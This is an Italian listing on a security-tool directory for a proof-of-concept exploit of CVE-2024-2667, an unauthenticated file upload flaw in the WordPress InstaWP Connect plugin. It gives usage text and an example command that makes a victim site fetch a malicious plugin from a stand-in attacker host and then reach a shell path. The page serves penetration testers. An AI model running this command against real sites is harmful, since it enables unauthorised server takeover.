Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2667-Poc — Exploit PoC per CVE-2024-2667: upload automatico di file arbitrari e accesso alla shell tramite validazione insufficiente dei file nell'endpoint REST API del plugin WordPress InstaWP Connect. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-2667-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

Exploit PoC per CVE-2024-2667: upload automatico di file arbitrari e accesso alla shell tramite validazione insufficiente dei file nell'endpoint REST API del plugin WordPress InstaWP Connect.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-2667-Poc 🚀

Descrizione

Il plugin InstaWP Connect – 1-click WP Staging & Migration per WordPress è vulnerabile a caricamenti arbitrari di file a causa di una validazione insufficiente dei file nell'endpoint REST API /wp-json/instawp-connect/v1/config in tutte le versioni fino alla 0.1.0.22 inclusa. Ciò consente ad attaccanti non autenticati di caricare file arbitrari.

Guida all'uso dello script ⚙️

Requisiti di installazione

DescrizioneDettagliIcona
Installa le librerie richiesteUsa pip per installare le librerie Python necessarie: requests e beautifulsoup4.🛠️
Comando per l'installazioneEsegui: pip install requests beautifulsoup4.📥

Esegui lo script

Verifica della vulnerabilità

Posizione della shell

DescrizioneDettagliIcona
Percorso della shellSe il caricamento riesce, la shell sarà accessibile all'indirizzo:🐚
wp-content/plugins/instawp-connect/shell.php.

utilizzo -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Scarica lo strumento
DescrizioneDettagliIcona
Esegui lo scriptEsegui lo script tramite riga di comando con gli argomenti richiesti.🚀
Argomenti richiesti- -up: URL del plugin (es., http://attacker-domain/malicious-plugin.zip).
- -u: URL WordPress target (es., http://victim-domain/).🔧
Comando di esempiopython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜
DescrizioneDettagliIcona
Controllo della versioneLo script esamina il file readme.txt per la versione del plugin target.🔍
Versione vulnerabileSe la versione è <= 0.1.0.22, lo script stampa: The site is vulnerable.⚠️
Versione sicuraSe la versione è > 0.1.0.22, lo script stampa: The site is not vulnerable.✅